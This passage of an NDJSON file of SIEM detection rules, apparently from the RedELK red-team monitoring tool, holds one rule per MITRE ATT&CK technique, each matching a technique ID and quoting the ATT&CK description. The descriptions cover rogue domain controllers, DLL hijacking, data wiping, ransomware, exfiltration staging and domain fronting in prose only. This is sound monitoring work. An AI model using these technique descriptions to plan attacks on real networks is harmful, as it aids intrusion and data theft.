Bernardi"],"actions":[],"description":"Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. [1] Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. [2]\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). [1] The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1207","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1207] DCShadow","query":"threat.technique.id: T1207","references":["https://attack.mitre.org/techniques/T1207"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1207","name":"DCShadow","id":"T1207"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. [1] Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, [2] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. [3]\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. [4] [5] [6]\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1038","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1038] DLL Search Order Hijacking","query":"threat.technique.id: T1038","references":["https://attack.mitre.org/techniques/T1038","https://attack.mitre.org/techniques/T1574/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1038","name":"DLL Search Order Hijacking","id":"T1038"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1038","name":"DLL Search Order Hijacking","id":"T1038"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1038","name":"DLL Search Order Hijacking","id":"T1038"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.\nPrograms may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests [1] are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. [2]\nAdversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1073","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1073] DLL Side-Loading","query":"threat.technique.id: T1073","references":["https://attack.mitre.org/techniques/T1073","https://attack.mitre.org/techniques/T1574/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1073","name":"DLL Side-Loading","id":"T1073"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.[1][2][3][4][5][6] Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.[4][5] In some cases politically oriented image files have been used to overwrite data.[2][3][4]\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[1][2][3][4][6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1485","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1485] Data Destruction","query":"threat.technique.id: T1485","references":["https://attack.mitre.org/techniques/T1485"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1485","name":"Data Destruction","id":"T1485"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1002","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1002] Data Compressed","query":"threat.technique.id: T1002","references":["https://attack.mitre.org/techniques/T1002","https://attack.mitre.org/techniques/T1560"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1002","name":"Data Compressed","id":"T1002"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.[1] [2] Some data encoding systems may also result in data compression, such as gzip.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1132","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1132] Data Encoding","query":"threat.technique.id: T1132","references":["https://attack.mitre.org/techniques/T1132"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1132","name":"Data Encoding","id":"T1132"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.[1][2][3][4] In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.[3]\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1486","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1486] Data Encrypted for Impact","query":"threat.technique.id: T1486","references":["https://attack.mitre.org/techniques/T1486"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1486","name":"Data Encrypted for Impact","id":"T1486"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1022","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1022] Data Encrypted","query":"threat.technique.id: T1022","references":["https://attack.mitre.org/techniques/T1022","https://attack.mitre.org/techniques/T1560"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1022","name":"Data Encrypted","id":"T1022"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1001","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1001] Data Obfuscation","query":"threat.technique.id: T1001","references":["https://attack.mitre.org/techniques/T1001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1001","name":"Data Obfuscation","id":"T1001"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.[1]\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[2]\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1074","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1074] Data Staged","query":"threat.technique.id: T1074","references":["https://attack.mitre.org/techniques/T1074"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1074","name":"Data Staged","id":"T1074"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1030","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1030] Data Transfer Size Limits","query":"threat.technique.id: T1030","references":["https://attack.mitre.org/techniques/T1030"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1030","name":"Data Transfer Size Limits","id":"T1030"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may access data objects from improperly secured cloud storage.\nMany cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.[1][2][3]\nMisconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.[4][5][6] Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1530","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1530] Data from Cloud Storage Object","query":"threat.technique.id: T1530","references":["https://attack.mitre.org/techniques/T1530"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1530","name":"Data from Cloud Storage Object","id":"T1530"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\nPolicies, procedures, and standards\nPhysical / logical network diagrams\nSystem architecture diagrams\nTechnical system documentation\nTesting / development credentials\nWork / project schedules\nSource code snippets\nLinks to network shares and other internal resources\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include Sharepoint, Confluence, and enterprise databases such as SQL Server.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1213","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1213] Data from Information Repositories","query":"threat.technique.id: T1213","references":["https://attack.mitre.org/techniques/T1213"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1213","name":"Data from Information Repositories","id":"T1213"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\nAdversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1005","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1005] Data from Local System","query":"threat.technique.id: T1005","references":["https://attack.mitre.org/techniques/T1005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1005","name":"Data from Local System","id":"T1005"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1039","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1039] Data from Network Shared Drive","query":"threat.technique.id: T1039","references":["https://attack.mitre.org/techniques/T1039"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1039","name":"Data from Network Shared Drive","id":"T1039"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.\nSome adversaries may also use Automated Collection on removable media.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1025","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1025] Data from Removable Media","query":"threat.technique.id: T1025","references":["https://attack.mitre.org/techniques/T1025"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1025","name":"Data from Removable Media","id":"T1025"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1491","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1491] Defacement","query":"threat.technique.id: T1491","references":["https://attack.mitre.org/techniques/T1491"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1491","name":"Defacement","id":"T1491"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\nOne such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. [1] Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. [2]\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1140","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1140] Deobfuscate/Decode Files or Information","query":"threat.technique.id: T1140","references":["https://attack.mitre.org/techniques/T1140"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1140","name":"Deobfuscate/Decode Files or Information","id":"T1140"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1089","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1089] Disabling Security Tools","query":"threat.technique.id: T1089","references":["https://attack.mitre.org/techniques/T1089","https://attack.mitre.org/techniques/T1562/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1089","name":"Disabling Security Tools","id":"T1089"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.[1][2][3] Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.[2] Adversaries have been observed leveraging third-party drivers like RawDisk to directly access disk content.[1][2] This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1488","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1488] Disk Content Wipe","query":"threat.technique.id: T1488","references":["https://attack.mitre.org/techniques/T1488","https://attack.mitre.org/techniques/T1561/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1488","name":"Disk Content Wipe","id":"T1488"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.[1][2][3][4][5] The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[1][2][3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1487","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1487] Disk Structure Wipe","query":"threat.technique.id: T1487","references":["https://attack.mitre.org/techniques/T1487","https://attack.mitre.org/techniques/T1561/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1487","name":"Disk Structure Wipe","id":"T1487"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. [1] Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1172","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1172] Domain Fronting","query":"threat.technique.id: T1172","references":["https://attack.mitre.org/techniques/T1172","https://attack.mitre.org/techniques/T1090/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1172","name":"Domain Fronting","id":"T1172"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.[1][2][3]\nDGAs can take the form of apparently random or \"gibberish\" strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.[1][2][4][5]\nAdversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and 